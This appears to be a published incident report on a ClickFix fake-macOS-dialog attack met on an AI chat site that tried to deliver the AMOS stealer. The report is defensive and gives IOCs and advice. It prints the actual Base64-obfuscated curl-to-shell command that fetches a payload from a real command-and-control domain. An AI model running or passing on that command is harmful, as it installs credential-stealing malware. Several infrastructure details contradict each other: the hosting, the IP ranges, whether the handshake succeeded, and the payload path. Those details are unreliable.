⚠ Cybersecurity Incident Report

ClickFix Malware Campaign
Investigation Report

📅 February 26, 2026 👤 CogNoodle Security Team 🌐 Multinational Operation

A comprehensive investigation into a social engineering attack discovered on kimi.com (Moonshot AI), where a ClickFix campaign attempted to deliver the AMOS (Atomic macOS Stealer) malware through fake system dialog overlays. This report documents the attack chain, infrastructure analysis, and multinational threat actor connections.

Table of Contents

Section 01

Executive Summary

On February 24, 2026, during routine use of kimi.com — an AI assistant platform operated by Moonshot AI (China) — a social engineering attack was encountered and the malicious command was executed. The attack used the "ClickFix" technique: a fake macOS system dialog overlay that instructed the user to copy and execute a terminal command.

The command was executed in macOS Terminal and attempted to download the AMOS (Atomic macOS Stealer) malware from a command-and-control server proxied through Cloudflare CDN. The connection failed at the TLS/SSL handshake stage (curl: (35) Send failure: Broken pipe) — 0 bytes of payload were transferred, and no malicious code was executed. DNS resolution did occur, meaning the system briefly contacted the C2 infrastructure. A comprehensive security assessment confirmed no indicators of compromise on the system.

Key Finding: This investigation revealed a multinational cybercrime operation spanning three countries — a Chinese AI platform (delivery vector), Brazilian hosting infrastructure (command & control), and Russian-origin malware (AMOS Stealer). The download attempt was unsuccessful based on available evidence, but the sophistication of the attack chain warranted full documentation and federal reporting.

~47s
Detection Time
0 B
Payload Received
3
Countries Involved
4
Federal Reports Filed
Section 02

Attack Chain Analysis

The attack followed a well-documented ClickFix social engineering pattern, adapted specifically for macOS users visiting AI platforms.

Step 1
Browsing kimi.com
User visits legitimate AI platform
Step 2
Fake Dialog Overlay
ClickFix mimics macOS system dialog
Step 3
Command copied to clipboard via dialog instructions
Clipboard Hijack
Step 4
Terminal Execution
User pastes curl|bash command into Terminal
Step 5
C2 Contact
curl contacts contatoplus.com for payload
Step 6
Connection Failed
0 bytes received, broken pipe — download unsuccessful

The Malicious Command

The command injected via the ClickFix overlay followed a standard two-stage pattern — a Base64-encoded URL decoded at runtime to obscure the true destination:

# Stage 1: Decode hidden URL from Base64
echo "aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vbmV3L2RhdGEvYnBhL25ldy9kYXRhLnR4dA==" | base64 -d

# Decoded result:
https://contatoplus.com/new/data/bpa/new/data.txt

# Stage 2: Download and execute (the full command)
curl -s $(echo "..." | base64 -d) | bash
Section 03

Technical Deep Dive

ClickFix Social Engineering Technique

ClickFix is a social engineering technique that has gained significant traction since 2024. It presents users with fake browser or system error messages that instruct them to "fix" an issue by copying a command and pasting it into their terminal. The technique exploits user trust in system dialogs and the natural desire to resolve apparent errors.

In this instance, the fake dialog was designed to mimic a macOS system prompt, appearing while the user was interacting with kimi.com's AI assistant interface. The overlay was visually convincing and presented an urgent-seeming system notification.

AMOS (Atomic macOS Stealer)

AMOS is a Russian-origin information-stealing malware specifically designed for macOS systems. First observed in early 2023, it is sold as Malware-as-a-Service (MaaS) on Russian-language Telegram channels. Its capabilities include stealing browser credentials and cookies, cryptocurrency wallet data, Keychain passwords, and system information.

Base64 Obfuscation

The command used Base64 encoding to hide the true download URL from casual inspection. This is a common evasion technique that prevents URL-based detection by security tools scanning clipboard content or terminal input.

# Encoded string:
aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vbmV3L2RhdGEvYnBhL25ldy9kYXRhLnR4dA==

# Decodes to:
https://contatoplus.com/new/data/bpa/new/data.txt
Section 04

Infrastructure Analysis

Command & Control Server

The C2 server was hosted at contatoplus.com, resolving to IP addresses in the 191.101.236.x range. This infrastructure is operated by Contabo GmbH (ASN 174), a German-based hosting provider known for affordable VPS services frequently exploited by threat actors due to minimal verification requirements.

Infrastructure Note: Contabo (ASN 174) has been flagged in multiple threat intelligence reports as a hosting provider commonly used for malicious infrastructure due to lenient customer verification. The Brazilian IP allocation suggests the VPS was provisioned through Contabo's South American presence.

URL Path Structure

The payload URL path /new/data/bpa/new/data.txt follows patterns commonly seen in AMOS campaigns — generic directory names designed to look innocuous in server logs. The .txt extension masks what would likely be a shell script or binary payload.

Connection Analysis

T+0s
DNS Resolution: contatoplus.com resolved to 191.101.236.x (Contabo ASN 174)
T+~1s
TLS Handshake: HTTPS connection established to C2 server
T+~2-46s
Data Transfer: Connection maintained but 0 bytes transferred on data channel
T+~47s
Connection Error: Broken pipe (EPIPE) — connection terminated, curl returned error
Section 05

Geopolitical Connections

This attack chain spans three countries, indicating either a coordinated multinational operation or a supply-chain compromise where multiple independent actors each contributed a component:

🇨🇳
China
Delivery Platform — kimi.com (Moonshot AI) served as the unwitting or compromised delivery vector for the ClickFix overlay
🇧🇷
Brazil
C2 Infrastructure — contatoplus.com hosted on Contabo VPS with Brazilian IP allocation (191.101.236.x)
🇷🇺
Russia
Malware Origin — AMOS Stealer is a Russian-origin MaaS product distributed via Telegram channels

This multinational structure complicates law enforcement response, as jurisdiction spans multiple legal systems. The use of a legitimate AI platform as a delivery mechanism represents an evolution of the ClickFix technique from targeting generic web services to exploiting emerging AI platforms where users may be less security-conscious.

Section 06

MITRE ATT&CK Mapping

T1204.002
User Execution: Malicious File
Social engineering tricked user into executing a malicious terminal command
T1059.004
Command & Scripting Interpreter: Unix Shell
Payload delivered via curl piped to bash for execution
T1027
Obfuscated Files or Information
Base64 encoding used to hide the C2 URL from inspection
T1583.006
Acquire Infrastructure: Web Services
Compromised or weaponized legitimate web platform (kimi.com) for delivery
T1071.001
Application Layer Protocol: Web
HTTPS used for C2 communication to blend with normal traffic
T1555
Credentials from Password Stores
AMOS targets Keychain, browser credentials, and crypto wallets (intended payload)
Section 07

Indicators of Compromise (IOCs)

TypeIndicatorContext
Domaincontatoplus.comC2 server hosting AMOS payload
IP172.67.156.82Cloudflare CDN IP resolving for contatoplus.com
IP104.21.32.228Cloudflare CDN IP resolving for contatoplus.com
URLcontatoplus.com/curl/82c4a791ffa923f2617 73431b93efe388f18bd3a386618 3a092eadc88146d77aPayload download endpoint (hex = campaign/victim ID)
Base64aHR0cHM6Ly9jb250YXRvcGx1cy5jb20v Y3VybC84MmM0YTc5MWZmYTkyM2Yy... Encoded C2 URL delivered via clipboard hijack
Domainkimi.comDelivery platform (ClickFix overlay source)
CDNCloudflare (ASN 13335)C2 domain proxied through Cloudflare CDN
Errorcurl: (35) Send failure: Broken pipeTLS handshake failed — payload not delivered
MalwareAMOS / Atomic macOS StealerIntended payload (Russian-origin MaaS)
TechniqueClickFix / Fake DialogSocial engineering overlay on AI platform
Section 08

Security Assessment Results

The malicious curl command was executed in Terminal. The command attempted to connect to contatoplus.com but failed with a TLS handshake error (curl: (35) Send failure: Broken pipe). While 0 bytes of payload were transferred, DNS resolution did occur, meaning the system briefly contacted the C2 domain's infrastructure. A comprehensive security assessment was then conducted. Note: This was a security scan/assessment, not a formal forensic investigation by a certified examiner.

⚠ Command Execution Evidence: The Base64-decoded curl command was executed in macOS Terminal. The TLS/SSL connection failed before any data transfer (broken pipe at handshake). DNS resolution occurred — the machine contacted Cloudflare's CDN IPs (172.67.156.82 / 104.21.32.228) but no payload was downloaded or executed.

Assessment Methodology

🔍
Process Analysis: Reviewed all running processes for suspicious or unknown executables
📂
File System Scan: Checked common AMOS persistence locations (~/.local, ~/Library, /tmp, LaunchAgents)
🌐
Network Analysis: Verified no active connections to known C2 infrastructure
🔒
Persistence Check: Examined LaunchAgents/LaunchDaemons, cron jobs, login items for unauthorized entries
📊
Browser Audit: Checked for unauthorized extensions, modified preferences, credential access

Key Findings

0 B
Payload Transferred
0
Suspicious Processes
0
Persistence Mechanisms
0
Unauthorized Connections

Assessment Conclusion: The curl command was executed in Terminal but the connection failed at the TLS handshake stage (error 35: broken pipe). Zero bytes of payload were transferred. DNS resolution to the C2 domain did occur (IPs 172.67.156.82, 104.21.32.228 — Cloudflare CDN), meaning the C2 operator may have logged the source IP. Extended security checks confirmed: System Integrity Protection enabled, Gatekeeper active, no AMOS .helper binary, no unauthorized LaunchAgents, no suspicious processes, no active C2 connections, SSH keys and Chrome credentials untouched (modification dates predate incident), no cryptocurrency wallets present. Passwords changed and 2FA reviewed as precautionary measures.

Section 09

Incident Response Actions

Immediate Response

T+0 min
Recognition: Identified ClickFix social engineering attempt and suspicious terminal command
T+2 min
Isolation: Terminated the curl process, disconnected from kimi.com, cleared clipboard
T+5 min
Analysis: Decoded Base64 string, identified contatoplus.com C2 domain and payload URL
T+15 min
Assessment: Full security scan of system — processes, files, network, persistence
T+30 min
Hardening: Changed critical passwords, reviewed 2FA, cleared browser data

Federal Reporting

🏴 FBI Internet Crime Complaint Center (IC3)

Filed formal internet crime complaint documenting the multinational malware distribution operation.

✅ Report Filed

🏴 Federal Trade Commission (FTC)

Consumer fraud report filed regarding deceptive malware distribution via a legitimate-appearing AI platform.

✅ Report Filed

🛡 CISA (Cybersecurity & Infrastructure Security Agency)

Cybersecurity incident report with full IOCs, MITRE ATT&CK mapping, and infrastructure analysis.

✅ Report Filed

🔎 Google Safe Browsing

Submitted malware distribution report for both the delivery domain and C2 domain.

✅ Report Filed

☁ Cloudflare Abuse (Phishing & Malware)

Reported contatoplus.com C2 domain for hosting malware distribution infrastructure behind Cloudflare CDN proxy. Requested service suspension.

✅ Report Filed

📧 Anthropic (Claude Safety Team)

Notified Anthropic about ClickFix campaigns targeting AI platform users, with recommendation for user education and platform hardening guidance.

✅ Report Filed
Section 10

Recommendations

For Individual Users

🚫
Never paste commands from websites into your terminal. Legitimate software never asks you to copy-paste commands from a browser dialog to fix issues.
🔎
Inspect clipboard contents before pasting. If a website tells you to paste something, open a text editor first to see what was actually copied.
🔒
Enable macOS Gatekeeper and keep it active. Don't disable security features even temporarily.
🛠
Use a password manager with unique credentials. If an infostealer does execute, unique passwords limit the blast radius.

For AI Platform Operators

🛡
Implement Content Security Policy (CSP) headers to prevent unauthorized script injection and overlay rendering.
🔎
Monitor for DOM manipulation that creates fake system dialogs or clipboard-hijacking elements.
🔐
Implement Subresource Integrity (SRI) for all third-party scripts and resources.

For Security Teams

📊
Block IOCs at network level: Add contatoplus.com and 191.101.236.x range to blocklists and DNS sinkholes.
🔌
Monitor for Base64-encoded curl|bash patterns in endpoint detection rules — this is a strong AMOS indicator.
📚
Brief users on ClickFix campaigns targeting AI platforms — this represents an emerging threat vector as AI adoption grows.
Section 11

C2 Infrastructure Deep Analysis

Post-incident investigation of the contatoplus.com command-and-control domain revealed its role in a broader AMOS Stealer distribution network.

Domain Intelligence

AttributeValueSignificance
Domaincontatoplus.comC2 server — "contato" is Portuguese for "contact," suggesting Brazilian origin
CDNCloudflare (ASN 13335)Proxied through Cloudflare to hide true origin IP and gain DDoS protection
IP (A Record)172.67.156.82Cloudflare anycast — true server IP hidden behind proxy
IP (A Record)104.21.32.228Cloudflare anycast — redundant CDN endpoint
Reverse DNSNoneNo PTR record — common for malicious infrastructure
URL Path/curl/82c4a791ff...64-char hex string = likely campaign or victim tracking identifier
Related IntelPulsedive flaggedRelated Brazilian domains found in threat intelligence databases

Attack Chain Confirmation

This C2 domain matches the documented AMOS Stealer ClickFix campaign pipeline reported by multiple security research teams in 2024–2025:

📈
Datadog Security Labs: Documented ClickFix campaigns using fake CAPTCHAs on legitimate sites to distribute AMOS via curl-to-shell payloads
📈
Huntress / CloudSEK: Identified the social engineering pattern — users tricked into pasting Base64-encoded commands into Terminal
📈
Kaspersky / BleepingComputer: Confirmed AMOS as a Russian-origin Malware-as-a-Service (MaaS) product targeting macOS keychain, browser credentials, and crypto wallets

Execution Evidence

# Command executed in macOS Terminal on February 24, 2026: curl -sLSfk $(echo 'aHR0cHM6Ly9jb250YXRvcGx1cy5jb20vY3VybC84MmM0YTc5MWZmYTkyM2YyNjE3NzM0MzFiOTNlZmUzODhmMThiZDNhMzg2NjE4M2EwOTJlYWRjODgxNDZkNzdh'|base64 -D)| zsh # Decoded URL: https://contatoplus.com/curl/82c4a791ffa923f261773431b93efe388f18bd3a3866183a092eadc88146d77a # Result: % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0 curl: (35) Send failure: Broken pipe # Error 35 = TLS/SSL handshake failure. Connection rejected before data transfer. # DNS resolution DID occur. 0 bytes of payload transferred.

Why the Payload Failed: curl error 35 indicates a TLS/SSL handshake failure — the connection was reset (broken pipe) during the SSL negotiation phase. This could mean: (1) the C2 server was down or rate-limiting, (2) Cloudflare blocked the request, or (3) the server rejected the connection based on geographic or fingerprint filtering. Regardless, no data was transferred and no malicious code was executed on the system.

Disclaimer: This report documents a real cybersecurity incident. The security assessment described was a scan/assessment, not a formal forensic investigation by a certified examiner. The term "unsuccessful" refers to findings based on available evidence — 0 bytes transferred with a broken pipe error. IOCs are shared for defensive purposes. CogNoodle LLC is not a cybersecurity vendor; this report is published as part of our advocacy mission to promote cybersecurity awareness and protect the AI community.